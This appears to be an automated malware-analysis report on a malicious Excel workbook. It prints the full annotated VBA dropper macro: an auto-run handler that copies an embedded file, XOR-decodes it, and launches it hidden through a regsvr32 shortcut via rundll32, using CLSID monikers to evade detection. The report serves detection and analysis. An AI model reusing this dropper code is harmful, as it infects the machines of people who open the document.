MALICIOUS
258
Risk Score
Heuristics 8
-
XOR-encoded strings (key 0x4A) — critical — SC_XOR_ENCODED: Found 2 Windows library/API name(s) XOR-encoded with single-byte key 0x4A: 'kernel32.dll', 'VirtualProtect'. Key 0x4A is ASCII 'J', the same byte the extracted macro's gPfWuMRpyskE routine obtains from Asc("J") when it decodes the dropped file in place.
Disassembly
x86 disassembly · validity: uncertain (0.553) — 1/1 branch targets land on an instruction boundary (100% coherence)0000B28F 212f and dword ptr [edi], ebp 0000B291 38242f cmp byte ptr [edi + ebp], ah 0000B294 267978 jns 0xb30f 0000B297 642e26264a dec edx 0000B29C 03242c add esp, dword ptr [esp + ebp] 0000B29F 251f3a2625 and eax, 0x25263a1f 0000B2A4 2b2e sub ebp, dword ptr [esi] 0000B2A6 2f das 0000B2A7 38642e26 cmp byte ptr [esi + ebp + 0x26], ah 0000B2AB 264a dec edx 0000B2AD 392f cmp dword ptr [edi], ebp 0000B2AF 3e15192f293f adc eax, 0x3f292f19 0000B2B5 3823 cmp byte ptr [ebx], ah 0000B2B7 3e331a xor ebx, dword ptr ds:[edx] 0000B2BA 38253e252925 cmp byte ptr [0x2529253e], ah 0000B2C0 264a dec edx 0000B2C2 0d2f3e182f or eax, 0x2f183e2f 0000B2C7 393a cmp dword ptr [edx], edi 0000B2C9 2524392f19 and eax, 0x192f3924 0000B2CE 3e382f cmp byte ptr ds:[edi], ch 0000B2D1 2b27 sub esp, dword ptr [edi] 0000B2D3 4a dec edx 0000B2D4 07 pop es 0000B2D5 2f das 0000B2D6 27 daa 0000B2D7 253833193e and eax, 0x3e193338 0000B2DC 382f cmp byte ptr [edi], ch 0000B2DE 2b27 sub esp, dword ptr [edi] 0000B2E0 4a dec edx 0000B2E1 2d2f3e1503 sub eax, 0x3153e2f 0000B2E6 3e2f das 0000B2E8 27 daa 0000B2E9 4a dec edx 0000B2EA 053a2f382b add eax, 0x2b382f3a
-
VBA macros detected — medium — 5 related findings — OLE_VBA_MACROS: Document contains VBA macro code
-
Potential Shell call in VBA — critical — OLE_VBA_SHELL: Potential Shell call in VBA. Matched line in script:
Shell "RunDLL32.EXE shell32.dll,ShellExec_RunDLL " & Chr(34) & n4lpppiDcX08yM & d1C6kWo5qGIcZ & Chr(34), 0 -
LOLBin reference in VBA — critical — OLE_VBA_LOLBIN: LOLBin reference in VBA. Matched line in script:
sl88rbqsvJ4.TargetPath = "C:\Windows\System32\regsvr32.exe" -
CreateObject call — high — OLE_VBA_CREATEOBJ: CreateObject call. Matched line in script:
Set bhJpP = CreateObject("new:{0D43FE01-F093-11CF-8940-00A0C9054228}") -
Workbook_Open macro — low — OLE_VBA_WBOPEN: Workbook_Open macro (runs automatically when the workbook is opened). Matched line in script:
Sub Workbook_open() -
Environ() call (env variable access) — low — OLE_VBA_ENVIRON: Environ() call (env variable access). Matched line in script:
hMZRAtjSR = Environ("LOCALAPPDATA") & "\Serv" -
Suspicious extracted artifact — info — EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
Extracted artifacts 3
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas<br>SHA-256: 63eb849d8cb3c752479d2e21bd0fb702cf2604c3f6ff1bc669e20f8ac5bced80 | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4561 bytes |
Preview script — first 1,000 lines of the extracted script:
' Module header of the Sheet1 code module as exported by olevba. It carries
' only VB attributes; no procedures are defined in this module before the
' next module header. The embedded OLE object that Workbook_open copies is
' referenced as Sheet1.OLEObjects(1).
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Module header of the ThisWorkbook code module. Every procedure that follows
' in this preview, including the auto-run Workbook_open handler, lives here.
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
' Returns the staging directory %LOCALAPPDATA%\Serv, creating it when it does
' not already exist.
' The object is created through a "new:{CLSID}" moniker rather than a ProgID;
' {0D43FE01-F093-11CF-8940-00A0C9054228} is the class id of
' Scripting.FileSystemObject, the same component MrAyjD2rl instantiates by
' name. Presumably the CLSID form is used so the ProgID string does not
' appear in the macro text — confirm against string-based detection rules.
' Detection note: an Office process creating a folder under %LOCALAPPDATA%\Serv.
Function BnitWDvCj() As String
Dim hMZRAtjSR As String
Dim bhJpP As Object
hMZRAtjSR = Environ("LOCALAPPDATA") & "\Serv"
' FileSystemObject via CLSID moniker (see header).
Set bhJpP = CreateObject("new:{0D43FE01-F093-11CF-8940-00A0C9054228}")
If Not bhJpP.FolderExists(hMZRAtjSR) Then
bhJpP.CreateFolder (hMZRAtjSR)
Else
End If
' Return value: the staging directory path (always, created or pre-existing).
BnitWDvCj = hMZRAtjSR
End Function
' Single-byte XOR over a byte array.
' ThGHAhmxQ: input bytes (any bounds); yrZxqN3O: one-byte key.
' Returns a new array with the same bounds where each element is
' input(i) Xor key. The input is not modified. Applying the routine twice
' with the same key yields the original bytes, so this is both the
' "encode" and "decode" direction; gPfWuMRpyskE calls it with key Asc("J").
Function cWnFD5ECd8Gw9b(ThGHAhmxQ() As Byte, yrZxqN3O As Byte) As Byte()
Dim MIoNQFixNBXX As Long
Dim LkTacRo5NzGc() As Byte
' Output array mirrors the input's lower and upper bounds.
ReDim LkTacRo5NzGc(LBound(ThGHAhmxQ) To UBound(ThGHAhmxQ))
For MIoNQFixNBXX = LBound(ThGHAhmxQ) To UBound(ThGHAhmxQ)
LkTacRo5NzGc(MIoNQFixNBXX) = ThGHAhmxQ(MIoNQFixNBXX) Xor yrZxqN3O
Next MIoNQFixNBXX
cWnFD5ECd8Gw9b = LkTacRo5NzGc
End Function
' Decodes a file in place: reads the whole file as bytes, XORs every byte
' with Asc("J") (0x4A) via cWnFD5ECd8Gw9b, and overwrites the file with the
' result. fileName: full path of the file to transform. No explicit return
' value is assigned (the function is declared without a return type).
' The key matches the report's static finding of 'kernel32.dll' and
' 'VirtualProtect' XOR-encoded with 0x4A, so the decoded output is
' presumably a PE that regsvr32 later loads — confirm on the carved payload.
' Note: ReDim ... (0 To LOF - 1) would fail on a zero-length file, and no
' error handling is present.
Function gPfWuMRpyskE(fileName As String)
Dim hjadgqwdbku As String
Dim gsdfsdf As Byte
Dim asdasdascasc() As Byte
Dim kjhjtyjvbnnfd() As Byte
Dim fdsjkhfdsjklnfs As Integer
Dim tyuiojlkh As Long
hjadgqwdbku = fileName
' Asc("J") = 74 = 0x4A, the XOR key.
gsdfsdf = Asc("J")
fdsjkhfdsjklnfs = FreeFile
' Pass 1: read the entire file into a byte array.
Open hjadgqwdbku For Binary Access Read As #fdsjkhfdsjklnfs
tyuiojlkh = LOF(fdsjkhfdsjklnfs)
ReDim asdasdascasc(0 To tyuiojlkh - 1)
Get #fdsjkhfdsjklnfs, , asdasdascasc
Close #fdsjkhfdsjklnfs
kjhjtyjvbnnfd = cWnFD5ECd8Gw9b(asdasdascasc, gsdfsdf)
' Pass 2: reopen the same path for write (same file number, now free) and
' replace the contents with the XORed bytes.
Open hjadgqwdbku For Binary Access Write As #fdsjkhfdsjklnfs
Put #fdsjkhfdsjklnfs, , kjhjtyjvbnnfd
Close #fdsjkhfdsjklnfs
End Function
' Copies %TEMP%\<SsUI> to the path QRYSKkuXeU if the source exists.
' QRYSKkuXeU: destination path (first parameter); SsUI: bare file name
' looked up inside %TEMP%. Silently does nothing when the source is missing.
' Uses Scripting.FileSystemObject by ProgID here, whereas BnitWDvCj creates
' the same component by CLSID.
' Detection note: file copy from %TEMP% into %LOCALAPPDATA%\Serv by Excel.
Sub MrAyjD2rl(QRYSKkuXeU As String, SsUI As String)
Dim bhJpP As Object
Dim uDO5QeoeYCZ As String
Dim sVXb2RfN As String
Set bhJpP = CreateObject("Scripting.FileSystemObject")
uDO5QeoeYCZ = Environ("TEMP")
' Source = %TEMP% joined with the given file name.
sVXb2RfN = bhJpP.BuildPath(uDO5QeoeYCZ, SsUI)
If bhJpP.FileExists(sVXb2RfN) Then
bhJpP.CopyFile sVXb2RfN, QRYSKkuXeU
End If
Set bhJpP = Nothing
End Sub
' Main dropper chain, called from Workbook_open:
'  1. copy 0x00bac729fe.log from %TEMP% into %LOCALAPPDATA%\Serv;
'  2. XOR-decode that file in place (gPfWuMRpyskE, key 0x4A);
'  3. write a shortcut "Protection overview.lnk" under
'     %APPDATA%\Microsoft\Windows\ whose target is regsvr32.exe /u /s <file>;
'  4. launch the shortcut hidden through RunDLL32 shell32.dll,ShellExec_RunDLL.
' Detection notes (all grounded in the lines below): Excel spawning
' rundll32.exe with ShellExec_RunDLL; rundll32 spawning regsvr32.exe with a
' ".log" argument; a .lnk created under %APPDATA%\Microsoft\Windows\ by an
' Office process. As written the .lnk directory is the parent of the Start
' Menu tree, not the Startup folder, so the shortcut alone does not appear
' to give logon persistence — confirm in a sandbox.
' Variables BDYBXoXN2, n4lpppiDcX08yM, d1C6kWo5qGIcZ and sl88rbqsvJ4 are
' never declared (no Option Explicit is visible in this preview).
Sub VhRwO4WtSm()
Dim uv1YWDCyOnxwN As Object
Dim s6WjBf8hE As Object
Dim e6IbjCVf As Object
Dim nLb39ozpR As String
Dim ZfUebm89krgz As String
Dim hMZRAtjSR As String
Dim GWC05BplCrglUAd As String
' File name of the embedded payload as dropped by the OLE package.
GWC05BplCrglUAd = "0x00bac729fe.log"
' hMZRAtjSR is still "" at this point (it is assigned on the next line), so
' this guard actually tests "\0x00bac729fe.log" on the current drive root,
' not the Serv folder; the chain therefore re-runs on each open unless that
' root-level file exists.
If Dir(hMZRAtjSR & "\0x00bac729fe.log") = "" Then
hMZRAtjSR = BnitWDvCj()
' Step 1: copy from %TEMP% into the staging folder.
Call MrAyjD2rl(hMZRAtjSR & "\0x00bac729fe.log", GWC05BplCrglUAd)
'Call Pc0riX9L1HYlDKY(hMZRAtjSR & "\0x00bac729fe.log", "\0x781da2b1c3")
'Call i8lh(hMZRAtjSR & "\0x00bac729fe.log", "\0x781da2b1c3")
' Step 2: XOR-decode the copied file in place.
gPfWuMRpyskE (hMZRAtjSR & "\0x00bac729fe.log")
' "new:" moniker again, this time without braces; F935DC22-1CF0-11D0-ADB9-
' 00C04FD58A0B is the WScript.Shell class id, which matches the
' ExpandEnvironmentStrings/CreateShortcut members used below.
Set BDYBXoXN2 = CreateObject("new:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B")
n4lpppiDcX08yM = BDYBXoXN2.ExpandEnvironmentStrings("%appdata%") + "\Microsoft\Windows\"
d1C6kWo5qGIcZ = "Protection overview.lnk"
' Step 3: build the shortcut. /u = DllUnregisterServer, /s = silent;
' WindowStyle "0" hides the window.
Set sl88rbqsvJ4 = BDYBXoXN2.CreateShortcut(n4lpppiDcX08yM & d1C6kWo5qGIcZ)
sl88rbqsvJ4.TargetPath = "C:\Windows\System32\regsvr32.exe"
sl88rbqsvJ4.Arguments = " /u /s " & Chr(34) & hMZRAtjSR & "\0x00bac729fe.log" & Chr(34)
sl88rbqsvJ4.Description = ""
sl88rbqsvJ4.WindowStyle = "0"
sl88rbqsvJ4.WorkingDirectory = n4lpppiDcX08yM
sl88rbqsvJ4.Save
Set sl88rbqsvJ4 = Nothing
' execute sl88rbqsvJ4 TitQzflyfw
' Step 4: open the .lnk via rundll32's ShellExec_RunDLL export; Shell's
' second argument 0 runs it with a hidden window.
Shell "RunDLL32.EXE shell32.dll,ShellExec_RunDLL " & Chr(34) & n4lpppiDcX08yM & d1C6kWo5qGIcZ & Chr(34), 0
End If
End Sub
' Auto-run entry point: executes when the workbook is opened (with macros
' enabled). Copies the first OLE object on Sheet1 — per the carved-artifact
' list, the Ole10Native package MBD000064B2 whose display name is
' 0x00bac729fe.log and whose recorded temp path is
' C:\Users\user\AppData\Local\Temp\0x00bac729fe.log — then hands off to
' VhRwO4WtSm. Presumably the .Copy call is what makes the OLE packager
' materialise the embedded file in %TEMP%, which is where MrAyjD2rl later
' looks for it — confirm in a sandbox.
Sub Workbook_open()
Dim rSDI94TRmtiDL As OLEObject
Set rSDI94TRmtiDL = Sheet1.OLEObjects(1)
rSDI94TRmtiDL.Copy
Dim TgKXzG3crsgMKgC1 As Object
' ADODB.Stream is opened in binary mode (Type = 1) and closed again without
' reading or writing anything; no observable effect in this listing.
Set TgKXzG3crsgMKgC1 = CreateObject("ADODB.Stream")
TgKXzG3crsgMKgC1.Type = 1
TgKXzG3crsgMKgC1.Open
TgKXzG3crsgMKgC1.Close
' Run the copy / decode / shortcut / launch chain.
VhRwO4WtSm
End Sub
|
|||
| ole10native_00.bin<br>SHA-256: 2e6ac7112a6f4a8a3df017e74c7192f3ec6fead38218a092bb405098684f93b3 | ole-package | OLE Ole10Native stream: MBD000064B2/Ole10Native | 40278 bytes |
| ole10native_00_0x00bac729fe.log<br>SHA-256: 37946cb6ca884e446e897fa4af2de9f765a0835dc203ec04a15dd01add3c6c6f | ole-package-payload | OLE Ole10Native payload: MBD000064B2/Ole10Native; display_name=0x00bac729fe.log; full_path=C:\Users\user\AppData\Local\Temp\0x00bac729fe.log; temp_path=; def_file= | 39936 bytes |
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
380 of 410 identifiers look randomly generated (e.g. 'rJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ'), which is consistent with name-mangling obfuscation. The carved artifact contains 6 long base64-like blob(s).
|
|||